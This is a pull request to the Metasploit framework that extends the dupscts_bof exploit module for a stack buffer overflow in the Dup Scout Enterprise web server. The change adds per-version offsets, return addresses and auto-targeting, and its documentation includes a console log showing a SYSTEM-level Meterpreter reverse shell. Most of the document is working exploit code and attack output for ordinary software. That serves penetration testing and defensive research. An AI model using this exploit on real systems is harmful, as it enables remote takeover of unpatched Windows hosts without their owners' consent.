### PR TITLE
dupscts_bof: Add additional targets and auto targeting

### DIFF
--- a/documentation/modules/exploit/windows/http/dupscts_bof.md
+++ b/documentation/modules/exploit/windows/http/dupscts_bof.md
@@ -1,73 +1,74 @@
 ## Vulnerable Application
 
-[Dup Scout Enterprise](http://www.dupscout.com) versions up to v9.5.14 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/4ead3eadc19bf3511e8dfd606624e310-dupscoutent_setup_v9.1.14.exe).
+This module exploits a stack-based buffer overflow vulnerability
+in the web interface of [Dup Scout Enterprise](http://www.dupscout.com)]
+versions <= 10.0.18, caused by improper bounds checking of the request
+path in HTTP GET requests sent to the built-in web server which can be
+leveraged to execute arbitrary code in the context of NT AUTHORITY\SYSTEM.
+
+This module supports x86 versions of Dup Scout Enterprise and x86
+Windows operating systems only and has been tested successfully on
+Windows 7 SP1 (x86) and Windows XP SP0 (x86).
 
 ## Verification Steps
-  1. Install a vulnerable Dup Scout Enterprise
-  2. Start `Dup Scout Enterprise` service
-  3. Start `Dup Scout Enterprise` client application
-  4. Navigate to `Tools` > `Dup Scout Options` > `Server`
-  5. Check `Enable Web Server On Port 80` to start the web interface
-  6. Start `msfconsole`
-  7. Do `use exploit/windows/http/dupscts_bof`
-  8. Do `set RHOST ip`
-  9. Do `check`
-  10. Verify the target is vulnerable
-  11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
-  12. Do `set LHOST ip`
-  13. Do `exploit`
-  14. Verify the Meterpreter session is opened
+
+Download:
+
+* https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe
+* https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe
+* https://www.exploit-db.com/apps/4ead3eadc19bf3511e8dfd606624e310-dupscoutent_setup_v9.1.14.exe
+* https://www.exploit-db.com/apps/3ca0c9aee534994bc6894bfb309e5a4f-dupscoutent_setup_v9.0.28.exe
+* https://web.archive.org/web/20170302/http://www.dupscout.com/setups/dupscoutent_setup_v9.0.28.exe
+* https://web.archive.org/web/20160408/http://www.dupscout.com/setups/dupscoutent_setup_v8.3.16.exe
+* https://web.archive.org/web/20160826/http://www.dupscout.com/setups/dupscoutent_setup_v8.4.16.exe
+
+Install the application from the link above and enable the web server by going to
+Tools -> Advanced Options -> Server -> Enable Web Server on Port.
+
+Metasploit:
+
+1. Start msfconsole
+1. Do: `use exploit/windows/http/dupscts_bof`
+1. Do: `set rhosts <rhosts>`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
 
 ## Scenarios
 
-###Dup Scout Enterprise v9.5.14 on Windows 7 SP1
+### Dup Scout Enterprise v9.9.14 on Windows 7 SP1 (x86)
 
 ```
-msf exploit(dupscts_bof) > show options 
+msf6 > use exploit/windows/http/dupscts_bof
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/http/dupscts_bof) > set rhosts 172.16.191.213
+rhosts => 172.16.191.213
+msf6 exploit(windows/http/dupscts_bof) > check
+[*] 172.16.191.213:80 - The target appears to be vulnerable. Dup Scout Enterprise version 9.9.14.
+msf6 exploit(windows/http/dupscts_bof) > set lhost 172.16.191.192 
+lhost => 172.16.191.192
+msf6 exploit(windows/http/dupscts_bof) > run
 
-Module options (exploit/windows/http/dupscts_bof):
+[*] Started reverse TCP handler on 172.16.191.192:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Dup Scout Enterprise version 9.9.14.
+[*] Selecting a target...
+[*] Using target: Dup Scout Enterprise v9.9.14 (x86)
+[*] Sending payload (8577 bytes) ...
+[*] Sending stage (175174 bytes) to 172.16.191.213
+[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.213:49380) at 2021-02-25 11:29:52 -0500
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOST    172.16.0.18      yes       The target address
-   RPORT    80               yes       The target port (TCP)
-   SSL      false            no        Negotiate SSL/TLS for outgoing connections
-   VHOST                     no        HTTP server virtual host
-
-
-Payload options (windows/meterpreter/reverse_tcp):
-
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
-   LHOST     172.16.0.20      yes       The listen address
-   LPORT     4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Dup Scout Enterprise v9.5.14
-
-
-msf exploit(dupscts_bof) > exploit 
-
-[*] Started reverse TCP handler on 172.16.0.20:4444 
-[*] Sending request...
-[*] Sending stage (957487 bytes) to 172.16.0.18
-[*] Meterpreter session 1 opened (172.16.0.20:4444 -> 172.16.0.18:49162) at 2017-04-26 15:16:08 +0100
-
-meterpreter > getuid 
+meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
-meterpreter > sysinfo 
-Computer        : PC-01
-OS              : Windows 7 (Build 7600).
+meterpreter > sysinfo
+Computer        : WIN-7-ULTIMATE-
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
 Architecture    : x86
-System Language : pt_PT
-Domain          : LAB
-Logged On Users : 3
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
 Meterpreter     : x86/windows
-meterpreter > 
+meterpreter >
 ```
+

--- a/modules/exploits/windows/http/dupscts_bof.rb
+++ b/modules/exploits/windows/http/dupscts_bof.rb
@@ -9,71 +9,183 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Seh
   include Msf::Exploit::Remote::Egghunter
   include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Dup Scout Enterprise GET Buffer Overflow',
-      'Description'    => %q{
-        This module exploits a stack-based buffer overflow vulnerability
-        in the web interface of Dup Scout Enterprise v9.5.14, caused by
-        improper bounds checking of the request path in HTTP GET requests
-        sent to the built-in web server. This module has been tested
-        successfully on Windows 7 SP1 x86.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'vportal',	     # Vulnerability discovery and PoC
-          'Daniel Teixeira'  # Metasploit module
-        ],
-      'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'thread'
+    super(
+      update_info(
+        info,
+        'Name' => 'Dup Scout Enterprise GET Buffer Overflow',
+        'Description' => %q{
+          This module exploits a stack-based buffer overflow vulnerability
+          in the web interface of Dup Scout Enterprise versions <= 10.0.18,
+          caused by improper bounds checking of the request path in HTTP GET
+          requests sent to the built-in web server which can be leveraged
+          to execute arbitrary code in the context of NT AUTHORITY\SYSTEM.
+
+          This module supports x86 versions of Dup Scout Enterprise and x86
+          Windows operating systems only and has been tested successfully on
+          Windows 7 SP1 (x86) and Windows XP SP0 (x86).
         },
-      'Platform'       => 'win',
-      'Payload'        =>
-        {
-          'BadChars'   => "\x00\x09\x0a\x0d\x20\x26",
-          'Space'      => 500
-        },
-      'Targets'        =>
-        [
-          [ 'Dup Scout Enterprise v9.5.14',
-            {
-              'Offset' => 2488,
-              'Ret'    => 0x10050ff3  # POP # POP # RET [libspp.dll]
-            }
-          ]
-        ],
-      'Privileged'     => true,
-      'DisclosureDate' => '2017-03-15',
-      'DefaultTarget'  => 0))
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'vportal', # Vulnerability discovery and PoC
+            'Daniel Teixeira', # Metasploit module
+            'bcoles', # Automatic targetting and additional targets
+          ],
+        'References' =>
+          [
+            ['CVE', '2017-13696'],
+            ['CWE', '121'],
+            ['EDB', '42557'],
+            ['EDB', '49217']
+          ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread'
+          },
+        'Platform' => 'win',
+        'Arch' => ARCH_X86,
+        'Payload' =>
+          {
+            'BadChars' => "\x00\x09\x0a\x0d\x20\x26",
+            'Space' => 500
+          },
+        'Targets' =>
+          [
+            [ 'Automatic', { 'auto' => true } ],
+            [
+              'Dup Scout Enterprise v8.3.16 (x86)',
+              {
+                'Version' => '8.3.16',
+                'Offset' => 552,
+                # 0x10045543 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
+                'Ret' => 0x10045543
+              }
+            ],
+            [
+              'Dup Scout Enterprise v8.4.16 (x86)',
+              {
+                'Version' => '8.4.16',
+                'Offset' => 552,
+                # 0x10045c33 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
+                'Ret' => 0x10045c33
+              }
+            ],
+            [
+              'Dup Scout Enterprise v9.0.28 (x86)',
+              {
+                'Version' => '9.0.28',
+                'Offset' => 552,
+                # 0x1004d983 : pop ebx # pop ecx # ret 0x20 |  {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
+                'Ret' => 0x1004d983
+              }
+            ],
+            [
+              'Dup Scout Enterprise v9.1.14 (x86)',
+              {
+                'Version' => '9.1.14',
+                'Offset' => 552,
+                # 0x10081b78 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
+                'Ret' => 0x10081b78
+              }
+            ],
+            [
+              'Dup Scout Enterprise v9.5.14 (x86)',
+              {
+                'Version' => '9.5.14',
+                'Offset' => 2488,
+                # POP # POP # RET [libspp.dll]
+                'Ret' => 0x10050ff3
+              }
+            ],
+            [
+              'Dup Scout Enterprise v9.9.14 (x86)',
+              {
+                'Version' => '9.9.14',
+                'Offset' => 2496,
+                # 0x10056c1d : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
+                'Ret' => 0x10056c1d
+              }
+            ],
+            [
+              'Dup Scout Enterprise v10.0.18 (x86)',
+              {
+                'Version' => '10.0.18',
+                'Offset' => 2496,
+                # 0x10056a16 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
+                'Ret' => 0x10056a16
+              }
+            ],
+          ],
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SERVICE_DOWN ],
+            'SideEffects' => [ IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          },
+        'Privileged' => true,
+        'DisclosureDate' => '2017-03-15',
+        'DefaultTarget' => 0
+      )
+    )
   end
 
   def check
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri'    => '/'
-    )
+    res = send_request_cgi({
+      'uri' => '/',
+      'method' => 'GET'
+    })
 
-    if res && res.code == 200
-      version = res.body[/Dup Scout Enterprise v[^<]*/]
-      if version
-        vprint_status("Version detected: #{version}")
-        if version =~ /9\.5\.14/
-          return Exploit::CheckCode::Appears
-        end
-        return Exploit::CheckCode::Detected
-      end
-    else
-      vprint_error('Unable to determine due to a HTTP connection timeout')
-      return Exploit::CheckCode::Unknown
+    unless res
+      return CheckCode::Unknown('Connection failed.')
     end
 
-    Exploit::CheckCode::Safe
+    version = res.body.scan(/>Dup Scout Enterprise v([\d.]+)</).flatten.first
+
+    unless version
+      return CheckCode::Safe('Target is not Dup Scout Enterprise.')
+    end
+
+    unless target_for_version(version)
+      return CheckCode::Detected("No targets for Dup Scout Enterprise version #{version}.")
+    end
+
+    CheckCode::Appears("Dup Scout Enterprise version #{version}.")
+  end
+
+  def dup_version
+    res = send_request_cgi({
+      'uri' => '/',
+      'method' => 'GET'
+    })
+
+    unless res
+      return fail_with(Failure::Unreachable, 'Could not determine Dup Scout Enterprise version. No reply.')
+    end
+
+    res.body.scan(/>Dup Scout Enterprise v([\d.]+)</).flatten.first
+  end
+
+  def target_for_version(version)
+    return unless version
+
+    targets.select { |t| version == t['Version'] }.first
   end
 
   def exploit
+    my_target = target
+
+    if target.name == 'Automatic'
+      print_status('Selecting a target...')
+      my_target = target_for_version(dup_version)
+      unless my_target
+        fail_with(Failure::NoTarget, 'Unable to automatically detect a target')
+      end
+    end
+
+    print_status("Using target: #{my_target.name}")
 
     eggoptions = {
       checksum: true,
@@ -86,18 +198,18 @@ class MetasploitModule < Msf::Exploit::Remote
       eggoptions
     )
 
-    sploit =  rand_text_alpha(target['Offset'])
-    sploit << generate_seh_record(target.ret)
+    sploit = rand_text_alpha(my_target['Offset'], payload_badchars)
+    sploit << generate_seh_record(my_target.ret)
     sploit << hunter
     sploit << make_nops(10)
     sploit << egg
-    sploit << rand_text_alpha(5500)
+    sploit << rand_text_alpha(5500, payload_badchars)
 
-    print_status('Sending request...')
+    print_status("Sending payload (#{sploit.length} bytes) ...")
 
-    send_request_cgi(
+    send_request_cgi({
       'method' => 'GET',
-      'uri'    => sploit
-    )
+      'uri' => sploit
+    })
   end
 end


### PR DESCRIPTION
* Resolve Rubocop violations
* Add `AutoCheck`
* Add `Notes`
* Add `References`
* Add a bunch of new targets
* Add auto targeting

# Targets

This module originally targeted version 9.5.14. The bug exists in many prior versions (all?) and up until version 10.0.18. This PR adds six new targets for these versions, from 8.3.16 to 10.0.18.

Unfortunately it seems that the 9.5.14 installer no longer exists (https://github.com/rapid7/metasploit-framework/pull/8303#issuecomment-785892338) so I wasn't able to test on this version.

The original module uses an egg hunter. ~~I'm not sure why as there is ample space (500+ bytes).~~ (ample space for a reverse shell payload, but not for meterpreter). Unfortunately, as the egg hunter is x86 only, this means that this module can only target x86 versions of the software on x86 operating systems. The bug is certainly exploitable on x86 versions of the software on x64 operating systems.

I could have removed the egg hunter, but that would effectively be a rewrite of this module, and I wouldn't be able to verify (with certainty) that the changes had not broken the existing 9.5.14 target. I figured the best solution was to leave it as is.

# References

It appears that the vendor was initially unresponsive to the vulnerability (hence still being exploitable long after version 9.5.14). There have been many bugs in this software and every man and his dog has dropped an exploit for it. Most are fairly similar and I've added a few to as references, even though this module pre-dates them.

At least [one exploit on exploitdb](https://www.exploit-db.com/exploits/49217) claims to exploit a different parameter in a HTTP GET URL, but adjusting the offset for the URL path and parameter reveals it is exploitable in an identical manner to the overflow triggered simply by an overly long path, suggesting that the parameter is irrelevant (I haven't verified).

This module was originally written by Daniel Teixeira and vportal is credited with discovery and PoC. These attributions have not changed in this PR.

**Edit:** As best I can tell, vportal (Victor Portal) is an incorrect attribution. It probably comes from [here](https://www.exploit-db.com/exploits/40868) which is a different bug.

Reverse engineering attribution is a tedious process in which I have no further interest. If you feel you should be attributed you're welcome to argue in the comments.

Note that this module is different from the overflow triggered by an overly long username (or password) in a login POST request, which also has a messy history and several exploits.
